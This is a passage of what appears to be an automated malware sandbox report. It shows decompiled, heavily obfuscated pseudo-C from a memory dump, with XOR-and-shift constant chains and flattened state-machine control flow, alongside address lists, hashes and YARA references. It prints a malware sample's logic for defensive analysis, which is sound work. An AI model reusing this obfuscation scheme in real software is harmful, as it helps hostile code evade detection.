				_v1640 = _v1640 >> 3;
				_v1640 = _v1640 ^ 0x00004856;
				_v1748 = 0x4fc2;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 * 0x31;
				_v1748 = _v1748 ^ 0x38a83a44;
				_v1748 = _v1748 ^ 0x38a82be9;
				_v1680 = 0xb86a;
				_v1680 = _v1680 | 0x02231922;
				_v1680 = _v1680 + 0xaf06;
				_v1680 = _v1680 ^ 0x022411a2;
				_v1644 = 0x3f39;
				_v1644 = _v1644 + 0xffff5bb9;
				_v1644 = _v1644 ^ 0xffffc632;
				_v1692 = 0xc5f9;
				_v1692 = _v1692 ^ 0xaafe79bc;
				_v1692 = _v1692 >> 0xf;
				_v1692 = _v1692 ^ 0x00013e0d;
				_v1740 = 0x58ed;
				_v1740 = _v1740 + 0xffff3fce;
				_v1740 = _v1740 * 0x34;
				_v1740 = _v1740 * 0x49;
				_v1740 = _v1740 ^ 0xfa04971a;
				_v1696 = 0xcc7a;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x00000d26;
				_v1732 = 0xc33a;
				_v1732 = _v1732 | 0xb66c57ae;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 * 0x56;
				_v1732 = _v1732 ^ 0xea449beb;
				_v1712 = 0xdae0;
				_v1712 = _v1712 >> 0xc;
				_v1712 = _v1712 ^ 0xc13d67df;
				_v1712 = _v1712 ^ 0xc13d455b;
				_v1716 = 0x5478;
				_v1716 = _v1716 | 0xa382055d;
				_v1716 = _v1716 * 0x26;
				_v1716 = _v1716 ^ 0x4558c259;
				_v1720 = 0xeafc;
				_v1720 = _v1720 + 0xffff5250;
				_v1720 = _v1720 ^ 0x4a0f2ed9;
				_v1720 = _v1720 ^ 0x4a0f1f8c;
				_v1664 = 0x8e28;
				_v1664 = _v1664 ^ 0x7b061f8d;
				_v1664 = _v1664 + 0xffffa0ec;
				_v1664 = _v1664 ^ 0x7b062de0;
				_v1724 = 0xce31;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 << 7;
				_v1724 = _v1724 << 5;
				_v1724 = _v1724 ^ 0xc4004273;
				_v1704 = 0xa554;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 * 0x35;
				_v1704 = _v1704 ^ 0x04475614;
				_v1660 = 0xb9dc;
				_v1660 = _v1660 + 0x9e03;
				_v1660 = _v1660 ^ 0x00011a8b;
				_v1652 = 0xf227;
				_t399 = _v1660;
				_v1652 = _v1652 / _t404;
				_v1652 = _v1652 ^ 0x00007d1f;
				while(1) {
					L1:
					_t389 = 0x2e;
					L2:
					while(_t354 != 0x2ecc014) {
						if(_t354 == 0xf8b22d1) {
							__eflags = _v1632 & _v1672;
							if(__eflags == 0) {
								_t340 = _a8( &_v1632, _a20);
								asm("sbb ecx, ecx");
								_t358 =  ~_t340 & 0x1c386f3a;
								L13:
								_t354 = _t358 + 0x2ecc014;
								while(1) {
									L1:
									_t389 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t389;
							if(_v1588 != _t389) {
								L20:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v1760);
									_t348 = E0024889D(0x24c0b0, _v1756, __eflags);
									_pop(_t360);
									E0023C680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
									E00242B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
									_t409 = _t409 + 0x30;
									_t346 = E00242025(_v1732, _t348, _v1712, _v1716);
									_t389 = 0x2e;
								}
								L19:
								_t354 = 0x1f252f4e;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L19;
							}
							__eflags = _v1586 - _t389;
							if(_v1586 != _t389) {
								goto L20;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L20;
							}
							goto L19;
						}
						if(_t354 == 0x1f252f4e) {
							_t342 = E0023595A(_v1720, _t399,  &_v1632, _v1664);
							asm("sbb ecx, ecx");
							_t358 =  ~_t342 & 0x0c9e62bd;
							__eflags = _t358;
							goto L13;
						}
						if(_t354 == 0x21983c19) {
							_push(_v1684);
							E00247BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E0024889D(0x24c090, _v1736, __eflags));
							_t346 = E00242025(_v1744, _t343, _v1636, _v1668);
							_t409 = _t409 + 0x20;
							_t354 = 0x3298743a;
							while(1) {
								L1:
								_t389 = 0x2e;
								goto L2;
							}
						}
						if(_t354 == 0x3181563a) {
							_t354 = 0x21983c19;
							continue;
						}
						if(_t354 != 0x3298743a) {
							L24:
							__eflags = _t354 - 0x2a8aa181;
							if(__eflags != 0) {
								continue;
							}
							L25:
							return _t346;
						}
						_t346 = E0023109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
						_t399 = _t346;
						_t409 = _t409 + 0x10;
						if(_t346 == 0xffffffff) {
							goto L25;
						}
						_t354 = 0xf8b22d1;
						goto L1;
					}
					E00231B5C(_v1724, _v1704, _v1660, _t399, _v1652);
					_t409 = _t409 + 0xc;
					_t354 = 0x2a8aa181;
					_t389 = 0x2e;
					goto L24;
				}
			}

0x00242b1f
0x00242b26
0x00242b2d
0x00242b34
0x00242b3b
0x00242b43
0x00242b44
0x00242b49
0x00242b54
0x00242b5d
0x00242b64
0x00242b69
0x00242b6f
0x00242b77
0x00242b7f
0x00242b87
0x00242b8f
0x00242b97
0x00242b9f
0x00242ba7
0x00242baf
0x00242bb7
0x00242bbf
0x00242bc7
0x00242bcf
0x00242bd4
0x00242bd9
0x00242be1
0x00242be9
0x00242bf1
0x00242bf9
0x00242c01
0x00242c09
0x00242c0e
0x00242c16
0x00242c1e
0x00242c29
0x00242c34
0x00242c3f
0x00242c4c
0x00242c4f
0x00242c53
0x00242c60
0x00242c64
0x00242c6c
0x00242c77
0x00242c7f
0x00242c8a
0x00242c92
0x00242c9a
0x00242ca2
0x00242caa
0x00242cb2
0x00242cba
0x00242cc6
0x00242cc9
0x00242ccd
0x00242cd5
0x00242cdd
0x00242ce5
0x00242ced
0x00242cfa
0x00242cfe
0x00242d06
0x00242d10
0x00242d18
0x00242d1d
0x00242d25
0x00242d2d
0x00242d3b
0x00242d40
0x00242d46
0x00242d52
0x00242d55
0x00242d59
0x00242d61
0x00242d6e
0x00242d72
0x00242d7a
0x00242d7f
0x00242d87
0x00242d92
0x00242d9a
0x00242da5
0x00242dad
0x00242db7
0x00242dbb
0x00242dc3
0x00242dcb
0x00242dd3
0x00242ddb
0x00242de3
0x00242deb
0x00242df6
0x00242e01
0x00242e0c
0x00242e14
0x00242e1c
0x00242e21
0x00242e29
0x00242e31
0x00242e3e
0x00242e47
0x00242e4b
0x00242e53
0x00242e5b
0x00242e60
0x00242e64
0x00242e6c
0x00242e74
0x00242e7c
0x00242e86
0x00242e8a
0x00242e92
0x00242e9a
0x00242e9f
0x00242ea7
0x00242eaf
0x00242eb7
0x00242ec4
0x00242ec8
0x00242ed0
0x00242ed8
0x00242ee0
0x00242ee8
0x00242ef0
0x00242ef8
0x00242f00
0x00242f08
0x00242f10
0x00242f18
0x00242f1f
0x00242f29
0x00242f2e
0x00242f36
0x00242f3e
0x00242f48
0x00242f4c
0x00242f54
0x00242f5c
0x00242f64
0x00242f6c
0x00242f7a
0x00242f7e
0x00242f82
0x00242f8a
0x00242f8a
0x00242f8c
0x00000000
0x00242f8d
0x00242f9f
0x002430a3
0x002430aa
0x00243193
0x0024319e
0x002431a0
0x00243094
0x00243094
0x00242f8a
0x00242f8a
0x00242f8c
0x00000000
0x00242f8c
0x00242f8a
0x002430b0
0x002430b8
0x002430e1
0x002430e1
0x002430e9
0x002430eb
0x002430f8
0x002430fd
0x0024312e
0x0024315f
0x00243164
0x00243175
0x0024317e
0x0024317e
0x002430da
0x002430da
0x00000000
0x002430da
0x002430ba
0x002430c3
0x00000000
0x00000000
0x002430c5
0x002430cd
0x00000000
0x00000000
0x002430cf
0x002430d8
0x00000000
0x00000000
0x00000000
0x002430d8
0x00242fa7
0x00243081
0x0024308c
0x0024308e
0x0024308e
0x00000000
0x0024308e
0x00242fb3
0x0024300c
0x00243044
0x0024305d
0x00243062
0x00243065
0x00242f8a
0x00242f8a
0x00242f8c
0x00000000
0x00242f8c
0x00242f8a
0x00242fbb
0x00243005
0x00000000
0x00243005
0x00242fc3
0x002431cc
0x002431cc
0x002431d2
0x00000000
0x00000000
0x002431e1
0x002431e1
0x002431e1
0x00242feb
0x00242ff0
0x00242ff2
0x00242ff8
0x00000000
0x00000000
0x00242ffe
0x00000000
0x00242ffe
0x002431bc
0x002431c1
0x002431c4
0x002431cb
0x00000000
0x002431cb

Strings

X, xrefs: 00242E29
xT, xrefs: 00242EAF
9?, xrefs: 00242DEB
A9W, xrefs: 00242C29
&, xrefs: 00242E64
sB, xrefs: 00242F2E
Up, xrefs: 00242C01
|7, xrefs: 00242BF9
VH, xrefs: 00242D9A

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
API String ID: 0-983689062
Opcode ID: a04f91dab14ab90d741565bfa905542eef083a9e8bb172c6fecf340adaaa556d
Instruction ID: abad22107c5dde3f1454ceb37df59a0331a14e48cd6fca8fa813317af5d102af
Opcode Fuzzy Hash: a04f91dab14ab90d741565bfa905542eef083a9e8bb172c6fecf340adaaa556d
Instruction Fuzzy Hash: 09F121715183819FD368CF61C549A5FBBF1FBC4308F508A1DF29A862A0D7B98A59CF42

Uniqueness

Uniqueness Score: -1.00%

Function 002388E5, Relevance: 11.5, Strings: 9, Instructions: 298
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E002388E5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _t325;
				short* _t331;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				short _t373;
				void* _t376;
				intOrPtr* _t380;
				void* _t382;

				 *(_t382 + 8) = 0xaa86;
				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
				 *(_t382 + 8) =  *(_t382 + 8) << 6;
				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
				 *(_t382 + 0x64) = 0xdd5d;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
				 *(_t382 + 0x74) = 0x57af;
				_t380 = __edx;
				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
				_t373 = 0;
				_t340 = 5;
				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
				_t376 = 0x1f5a6ea2;
				 *(_t382 + 0x68) = 0xf929;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
				 *(_t382 + 0x74) = 0x8254;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
				 *(_t382 + 0x48) = 0x274c;
				_t341 = 0x4c;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
				 *(_t382 + 0x7c) = 0x6684;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
				 *(_t382 + 0x40) = 0x1902;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
				 *(_t382 + 0x6c) = 0xb89b;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
				 *(_t382 + 0x14) = 0x3892;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
				 *(_t382 + 0x28) = 0xad3d;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
				 *(_t382 + 0x58) = 0xde2;
				_t342 = 0x39;
				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
				 *(_t382 + 0x1c) = 0xba82;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
				 *(_t382 + 0x40) = 0xa3d9;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
				 *(_t382 + 0x5c) = 0xecab;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
				 *(_t382 + 0x80) = 0x1387;
				_t343 = 0x2a;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
				 *(_t382 + 0x4c) = 0x7ada;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
				 *(_t382 + 0x90) = 0x1591;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
				 *(_t382 + 0x2c) = 0x3f89;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
				 *(_t382 + 0x98) = 0x7441;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
				 *(_t382 + 0x48) = 0x7f1e;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
				 *(_t382 + 0x8c) = 0x831c;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
				 *(_t382 + 0x30) = 0x92b6;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
				 *(_t382 + 0x28) = 0x1d89;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
				 *(_t382 + 0x58) = 0x126d;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
				 *(_t382 + 0x7c) = 0x1a69;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
				 *(_t382 + 0x20) = 0xff0b;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
				 *(_t382 + 0x6c) = 0xe12c;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
				 *(_t382 + 0x34) = 0xd574;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
				 *(_t382 + 0x88) = 0x5832;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
				 *(_t382 + 0x50) = 0x55a1;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
				 *(_t382 + 0x14) = 0xc073;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
				 *(_t382 + 0x94) = 0xf1be;
				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
				_t344 = 0xa;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
				 *(_t382 + 0x60) = 0x96ef;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
				 *(_t382 + 0x38) = 0xec0c;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
				do {
					while(_t376 != 0x3ac0a14) {
						if(_t376 == 0x7fec1df) {
							_t344 = _t382 + 0x2ac;
							E00240D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
							_t382 = _t382 + 0xc;
							_t376 = 0x12c07630;
							continue;
						} else {
							if(_t376 == 0x12c07630) {
								_push( *(_t382 + 0x1c));
								E002329E3(_t382 + 0x2b0, 0x104, E0024889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
								_t344 =  *(_t382 + 0x5c);
								E00242025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
								_t382 = _t382 + 0x30;
								_t376 = 0x3ac0a14;
								continue;
							} else {
								if(_t376 == 0x1f5a6ea2) {
									_t376 = 0x2b635c32;
									continue;
								} else {
									if(_t376 == 0x2b635c32) {
										E00243E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
										_t331 = E002328CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
										_t382 = _t382 + 0xc;
										_t376 = 0x7fec1df;
										_t344 = 0;
										 *_t331 = 0;
										continue;
									} else {
										if(_t376 == 0x2c9ad714) {
											E00244F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
										} else {
											if(_t376 != 0x33ecfade) {
												goto L16;
											} else {
												_t263 = _t380 + 4; // 0xedb0bf04
												E00246CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
												_t382 = _t382 + 0x20;
												_t344 = 1;
												_t376 = 0x2c9ad714;
												_t373 =  !=  ? 1 : _t373;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t373;
					}
					_t325 = E0023B566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
					_t337 = _t325;
					_t382 = _t382 + 0x30;
					__eflags = _t325 - 0xffffffff;
					if(__eflags == 0) {
						_t376 = 0x18af80d5;
						goto L16;
					} else {
						_t376 = 0x33ecfade;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t376 - 0x18af80d5;
				} while (__eflags != 0);
				goto L19;
			}

0x002388eb
0x002388f3
0x002388fb
0x00238900
0x00238905
0x0023890d
0x00238915
0x0023891d
0x00238925
0x00238935
0x00238937
0x00238942
0x00238944
0x00238949
0x00238952
0x0023895d
0x00238962
0x0023896a
0x00238972
0x0023897a
0x00238982
0x00238987
0x0023898f
0x0023899c
0x0023899f
0x002389a3
0x002389ab
0x002389b3
0x002389bb
0x002389c3
0x002389cb
0x002389d3
0x002389e3
0x002389e7
0x002389ef
0x002389f7
0x002389ff
0x00238a07
0x00238a0f
0x00238a14
0x00238a1c
0x00238a24
0x00238a2c
0x00238a34
0x00238a3c
0x00238a41
0x00238a46
0x00238a4e
0x00238a5b
0x00238a5c
0x00238a66
0x00238a6a
0x00238a72
0x00238a7a
0x00238a7f
0x00238a84
0x00238a8c
0x00238a94
0x00238a9c
0x00238aa4
0x00238aac
0x00238ab4
0x00238abc
0x00238ac1
0x00238acb
0x00238ad3
0x00238ae8
0x00238ae9
0x00238af0
0x00238afb
0x00238b08
0x00238b0c
0x00238b14
0x00238b1c
0x00238b27
0x00238b2f
0x00238b3a
0x00238b42
0x00238b47
0x00238b4f
0x00238b54
0x00238b5c
0x00238b70
0x00238b77
0x00238b82
0x00238b8a
0x00238b92
0x00238b97
0x00238b9f
0x00238baa
0x00238bb2
0x00238bbd
0x00238bc5
0x00238bcd
0x00238bd2
0x00238bd7
0x00238bdf
0x00238be7
0x00238bf4
0x00238bf8
0x00238c00
0x00238c08
0x00238c10
0x00238c15
0x00238c1a
0x00238c22
0x00238c2a
0x00238c32
0x00238c3a
0x00238c42
0x00238c47
0x00238c51
0x00238c55
0x00238c5d
0x00238c65
0x00238c6d
0x00238c75
0x00238c7d
0x00238c85
0x00238c8d
0x00238c95
0x00238c9d
0x00238cb0
0x00238cb7
0x00238cc2
0x00238cca
0x00238ccf
0x00238cd7
0x00238cdf
0x00238ce7
0x00238cef
0x00238cf4
0x00238cf9
0x00238d01
0x00238d17
0x00238d1e
0x00238d21
0x00238d28
0x00238d33
0x00238d3b
0x00238d43
0x00238d4b
0x00238d53
0x00238d5b
0x00238d68
0x00238d6c
0x00238d71
0x00238d79
0x00238d79
0x00238d8b
0x00238ecd
0x00238ee0
0x00238ee5
0x00238ee8
0x00000000
0x00238d91
0x00238d97
0x00238e4f
0x00238ea1
0x00238eb3
0x00238eb7
0x00238ebc
0x00238ebf
0x00000000
0x00238d9d
0x00238da3
0x00238e45
0x00000000
0x00238da9
0x00238daf
0x00238e17
0x00238e2e
0x00238e33
0x00238e36
0x00238e3b
0x00238e3d
0x00000000
0x00238db1
0x00238db7
0x00238f65
0x00238dbd
0x00238dc3
0x00000000
0x00238dc9
0x00238dd0
0x00238dee
0x00238df5
0x00238df8
0x00238df9
0x00238e00
0x00000000
0x00238e00
0x00238dc3
0x00238db7
0x00238daf
0x00238da3
0x00238d97
0x00238f6b
0x00238f77
0x00238f77
0x00238f30
0x00238f35
0x00238f37
0x00238f3a
0x00238f3d
0x00238f49
0x00000000
0x00238f3f
0x00238f3f
0x00000000
0x00238f3f
0x00000000
0x00238f4e
0x00238f4e
0x00238f4e
0x00000000

Strings

2X, xrefs: 00238C9D
2\c+, xrefs: 00238E45
2\c+, xrefs: 00238DA9
0, xrefs: 00238A6A
,, xrefs: 00238C5D
Ui=, xrefs: 00238915
EZX-, xrefs: 00238A24
At, xrefs: 00238B5C
Q#JK, xrefs: 002389AB

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
API String ID: 2962429428-1096774584
Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction ID: 3597c8509887a9e209f02878ed3091ff690987658e6ee324d715a179228464f9
Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction Fuzzy Hash: E9F11FB25083809FD368CF65C48A65BFBE1BBC4748F10891DF1DA962A0C7B98959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002426F5, Relevance: 11.5, Strings: 9, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002426F5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __edi;
				void* __ebp;
				intOrPtr _t199;
				intOrPtr _t201;
				void* _t202;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr* _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				void* _t216;
				void* _t224;
				void* _t237;
				intOrPtr _t241;
				void* _t242;
				intOrPtr _t246;
				signed int* _t247;

				_t247 =  &_v88;
				_v12 = 0x29be25;
				_v8 = 0x714c58;
				_t241 = 0;
				_t210 = __edx;
				_v4 = 0;
				_v28 = 0x1199;
				_t246 = __ecx;
				_v28 = _v28 + 0xffffe920;
				_t242 = 0x2efb68f6;
				_v28 = _v28 ^ 0xffffad72;
				_v32 = 0x5bb2;
				_t212 = 0x22;
				_v32 = _v32 / _t212;
				_v32 = _v32 ^ 0x00002aec;
				_v56 = 0xeb34;
				_t213 = 0x1b;
				_v56 = _v56 * 0x6a;
				_v56 = _v56 + 0x2965;
				_v56 = _v56 ^ 0x0061feda;
				_v84 = 0xfe4e;
				_v84 = _v84 + 0xd2a6;
				_v84 = _v84 >> 3;
				_v84 = _v84 | 0x3d0bc2c6;
				_v84 = _v84 ^ 0x3d0bc81e;
				_v20 = 0x5db0;
				_v20 = _v20 + 0xffffd438;
				_v20 = _v20 ^ 0x00005602;
				_v24 = 0xa932;
				_v24 = _v24 * 0x1f;
				_v24 = _v24 ^ 0x00145068;
				_v88 = 0xc29f;
				_v88 = _v88 * 0x34;
				_v88 = _v88 ^ 0xcbbf1de0;
				_v88 = _v88 + 0x67bb;
				_v88 = _v88 ^ 0xcb98f8b4;
				_v36 = 0x7c84;
				_v36 = _v36 + 0x6da7;
				_v36 = _v36 ^ 0x0000df84;
				_v60 = 0xf0d8;
				_v60 = _v60 + 0xffffcb07;
				_v60 = _v60 * 0x50;
				_v60 = _v60 ^ 0x003a95e0;
				_v44 = 0x6681;
				_v44 = _v44 + 0xffff19d2;
				_v44 = _v44 / _t213;
				_v44 = _v44 ^ 0x097b3a7d;
